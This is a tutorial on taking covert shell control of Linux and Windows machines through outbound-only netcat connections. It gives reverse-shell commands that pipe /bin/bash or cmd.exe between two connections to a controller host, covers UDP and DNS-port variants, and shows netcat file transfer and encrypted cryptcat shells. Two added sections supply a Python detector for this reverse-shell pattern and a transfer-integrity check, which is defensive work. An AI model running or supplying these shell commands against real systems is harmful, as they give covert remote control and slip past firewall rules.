The goal of this article is to remotely control (shell access) a Windows/Linux/whatever-OS box without any open incoming ports on the target side (the target is the box whose shell we control).
We need one additional tool, Netcat. The Windows version can be found here: http://joncraton.org/files/nc111nt.zip/
[v1.11 NT www.vulnwatch.org/netcat/]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [options] [hostname] [port]
-d detach from console, background mode
-e prog inbound program to exec [dangerous!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-L listen harder, re-listen on socket close
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]
IPs used in both examples:
Windows box: 192.168.12.138 (Note: netcat binary is called nc.exe!)
Linux box: 192.168.12.141 (Note: netcat binary is called netcat!)
EXAMPLE 1 (CONTROL LINUX):
In this example, we want to be able to control our Linux box from a Windows workstation. The trick is that the Linux box (which we will control) doesn't need any open incoming ports on its firewall.
On the Windows box, we start two listening netcat sessions:
#1: >nc -vv -l -p 80
#2: >nc -vv -l -p 25
#1 will be used for sending input (our commands)
#2 will be used for receiving the output
We choose two common ports (80=http, 25=smtp) which are often allowed as outgoing ports.
Next we invoke a command which pipes bash between the two connections: its stdin comes from the port 80 connection (our commands) and its stdout goes to the port 25 connection (the output):
linuxBox:~# netcat 192.168.12.138 80|/bin/bash|netcat 192.168.12.138 25
You can now use the two Windows shells to control the Linux box: type commands in #1 and read their output in #2.
EXAMPLE 2 (CONTROL WINDOWS):
To explain those pipe commands better, we now use our Linux box to control the Windows box.
On the Linux box, start two listening netcat sessions (the same as above):
linuxBox:~# netcat -vv -l -p 25
linuxBox:~# netcat -vv -l -p 80
ATTENTION! Be sure those ports are not used by system daemons (web and mail servers). If so, stop the services or choose different ports!
Now, on the Windows box, we start netcat with cmd.exe piped to it, like this:
> nc 192.168.12.141 80|cmd.exe
The result is that cmd.exe now reads its commands from the Linux box (port 80), but its output is not visible on the Linux box; it still appears in the Windows console.
So we also route the output back to the Linux box on port 25:
>nc 192.168.12.141 80|cmd.exe|nc 192.168.12.141 25
If only a few outgoing ports are allowed, you can use UDP instead of TCP (add the -u parameter to netcat on both sides, for example: linuxBox:~# netcat -vv -l -p 80 -u). Perhaps UDP port 53 (DNS) is open..
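The two examples above have a recognisable footprint on the controlled host, and that is what a defender looks for: a shell whose stdin/stdout are network sockets, or netcat-family processes holding outbound connections, typically two of them to the same remote host (one for commands, one for output) on ports that outbound firewall rules tend to allow. The following detector is an added example and not part of the original article; it runs over constructed connection records in an assumed "proto pid process laddr:lport raddr:rport state" format (adapt parse_connections() to whatever your EDR, auditd or Sysmon Event ID 3 export actually emits). The sample records reuse the article's addresses (.141 controlled, .138 controller) and also cover the UDP variant.

```python
"""
Added example (not part of the original article): a detector for the
reverse-shell pattern the article describes, run over constructed
connection records.

The record format "proto pid process laddr:lport raddr:rport state" is an
assumption made for this example.
"""
import re
from collections import defaultdict

# Constructed sample: one benign browser, the article's two netcat channels
# from the Linux box (.141) to the Windows box (.138), the UDP variant,
# a legitimate mail daemon, and a bare shell with a socket as its stdio.
SAMPLE_CONNECTIONS = """\
tcp 1203 firefox 192.168.12.141:41022 198.51.100.10:443 ESTABLISHED
tcp 2210 netcat 192.168.12.141:41101 192.168.12.138:80 ESTABLISHED
tcp 2212 netcat 192.168.12.141:41102 192.168.12.138:25 ESTABLISHED
udp 2300 netcat 192.168.12.141:41200 192.168.12.138:53 ESTABLISHED
tcp 2405 postfix 192.168.12.141:44010 10.0.0.5:25 ESTABLISHED
tcp 2501 bash 192.168.12.141:41300 203.0.113.7:4444 ESTABLISHED
"""

# Process names that should never own a remote socket on their own.
SHELL_PROCS = {"bash", "sh", "dash", "zsh", "cmd.exe", "powershell.exe"}
# The netcat family named in the article, plus common variants.
NETCAT_PROCS = {"nc", "ncat", "netcat", "nc.exe", "cryptcat", "cryptcat.exe"}
# Ports chosen in the article because outbound rules usually permit them.
COMMONLY_ALLOWED_PORTS = {80, 25, 53, 443}

LINE_RE = re.compile(
    r"^(?P<proto>tcp|udp)\s+(?P<pid>\d+)\s+(?P<proc>\S+)\s+"
    r"(?P<laddr>[\d.]+):(?P<lport>\d+)\s+"
    r"(?P<raddr>[\d.]+):(?P<rport>\d+)\s+(?P<state>\S+)$"
)


def parse_connections(text):
    """Parse records in the constructed format; malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        rec = m.groupdict()
        for key in ("pid", "lport", "rport"):
            rec[key] = int(rec[key])
        records.append(rec)
    return records


def detect_reverse_shell(records):
    """Return a list of findings (dicts with severity, pid, proc, remote, reason)."""
    findings = []
    for r in records:
        if r["raddr"].startswith("127."):
            continue  # loopback chatter is not an outbound channel
        remote = f"{r['raddr']}:{r['rport']}/{r['proto']}"
        if r["proc"] in SHELL_PROCS:
            findings.append({"severity": "high", "pid": r["pid"], "proc": r["proc"],
                             "remote": remote,
                             "reason": "shell process owns a network socket"})
        elif r["proc"] in NETCAT_PROCS:
            sev = "medium" if r["rport"] in COMMONLY_ALLOWED_PORTS else "low"
            findings.append({"severity": sev, "pid": r["pid"], "proc": r["proc"],
                             "remote": remote,
                             "reason": "netcat-family process with outbound connection"})
    # The two-channel layout: several netcat sockets to one peer on different ports.
    ports_by_peer = defaultdict(set)
    for r in records:
        if r["proc"] in NETCAT_PROCS and not r["raddr"].startswith("127."):
            ports_by_peer[r["raddr"]].add(r["rport"])
    for raddr, ports in ports_by_peer.items():
        if len(ports) >= 2:
            findings.append({"severity": "high", "pid": None, "proc": "netcat-family",
                             "remote": raddr,
                             "reason": f"paired channels to one host on ports {sorted(ports)} "
                                       "(command + output pattern)"})
    return findings


if __name__ == "__main__":
    for f in detect_reverse_shell(parse_connections(SAMPLE_CONNECTIONS)):
        print(f"[{f['severity']:6}] pid={f['pid']} {f['proc']} -> {f['remote']}: {f['reason']}")
```

The per-connection rules catch a single channel; the pairing rule is the one that specifically matches the article's layout, since a legitimate tool rarely opens two sockets to the same peer on 80 and 25 at once. On the sample input it reports the bash socket and the paired channels as high and the three individual netcat connections as medium, while postfix and the browser stay quiet.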
You can also use netcat to transfer files… how? Here we transfer a file from the Windows box to the Linux box. Use the -w switch (timeout for connects and final net reads) for this!
Save the file as /receve on the Linux box:
linuxBox:~# netcat -vv -l -p 26 -w 30 > /receve
And on the client side we send the file evre.ini:
> nc -vv 192.168.12.141 26 -w 2 < evre.ini
It looks like this:
C:_dataneophobfilesexternal>nc -vv 192.168.12.141 25 -w 2 < evre.ini
sent 1058, rcvd 0: NOTSOCK
linuxBox:~# netcat -vv -l -p 25 -w 30 > /receve
listening on [any] 25 ...
connect to [192.168.12.141] from windowsBox [192.168.12.138] 3212
sent 0, rcvd 1058
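Because -w makes either side give up after a timeout, a transfer can end early and still look finished. The "sent N, rcvd M" summary that -vv prints on exit is the check: the sender's sent count must equal the receiver's rcvd count, and when both copies are at hand a SHA-256 digest of each (sha256sum on Linux, certutil -hashfile on Windows) settles it. The script below is an added example, not part of the original article; the two summary lines are copied from the session above and the file contents are constructed.

```python
"""
Added example (not part of the original article): verify that a netcat
file transfer like the one above actually completed.
"""
import hashlib
import re

SUMMARY_RE = re.compile(r"sent (?P<sent>\d+), rcvd (?P<rcvd>\d+)")

# Sender side (Windows, nc -vv ... < evre.ini) and receiver side
# (Linux, netcat -vv -l ... > /receve) summary lines from the session above.
SENDER_SUMMARY = "sent 1058, rcvd 0: NOTSOCK"
RECEIVER_SUMMARY = "sent 0, rcvd 1058"


def parse_nc_summary(line):
    """Return (sent, rcvd) from a netcat -vv summary line, or None if absent."""
    m = SUMMARY_RE.search(line)
    if not m:
        return None
    return int(m.group("sent")), int(m.group("rcvd"))


def transfer_complete(sender_line, receiver_line):
    """True when the sender's byte count equals the receiver's and is non-zero."""
    s = parse_nc_summary(sender_line)
    r = parse_nc_summary(receiver_line)
    if s is None or r is None:
        return False
    sent, _ = s
    _, rcvd = r
    return sent > 0 and sent == rcvd


def sha256_hex(data):
    """Digest to compare on both ends of the transfer."""
    return hashlib.sha256(data).hexdigest()


def files_match(sent_bytes, received_bytes):
    """Size and digest must both agree; a timed-out receiver holds a short file."""
    return (len(sent_bytes) == len(received_bytes)
            and sha256_hex(sent_bytes) == sha256_hex(received_bytes))


if __name__ == "__main__":
    print("byte counts agree:", transfer_complete(SENDER_SUMMARY, RECEIVER_SUMMARY))
    original = b"[settings]\nkey=value\n" * 50   # constructed stand-in for evre.ini
    truncated = original[:-7]                   # what a timed-out receiver might hold
    print("full copy matches:", files_match(original, original))
    print("truncated copy matches:", files_match(original, truncated))
```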
ADD SOME ENCRYPTION
If you need to encrypt the data, you can use cryptcat, which can be found here: http://farm9.org/Cryptcat/
There is a Windows and a Linux version available. The Windows version (which can only be downloaded as source) contains a typo in the source (doexec.c: replace RecvBuffer with Buffer), a binary version can be downloaded in the tools section.
Cryptcat is essentially netcat with an extra -k option (which sets the shared secret). Here is example 1 with cryptcat:
On the Windows box, we start two listening cryptcat sessions (with the shared secret test):
#1: >cryptcat -vv -l -p 80 -k test
#2: >cryptcat -vv -l -p 25 -k test
Pipe the shell on the Linux box:
linuxBox:/# sleep 10000 | cryptcat 192.168.12.138 80 -k test| /bin/bash | cryptcat 192.168.12.138 25 -k test
** Note: here we don't use telnet anymore (as it's unencrypted); we use cryptcat. **
The example 2 inputs would look like this:
linuxBox:~# cryptcat -vv -l -p 25 -k test
linuxBox:~# cryptcat -vv -l -p 80 -k test
Connect from the Windows box:
>cryptcat 192.168.12.141 80 -k test|cmd.exe|cryptcat 192.168.12.141 25 -k test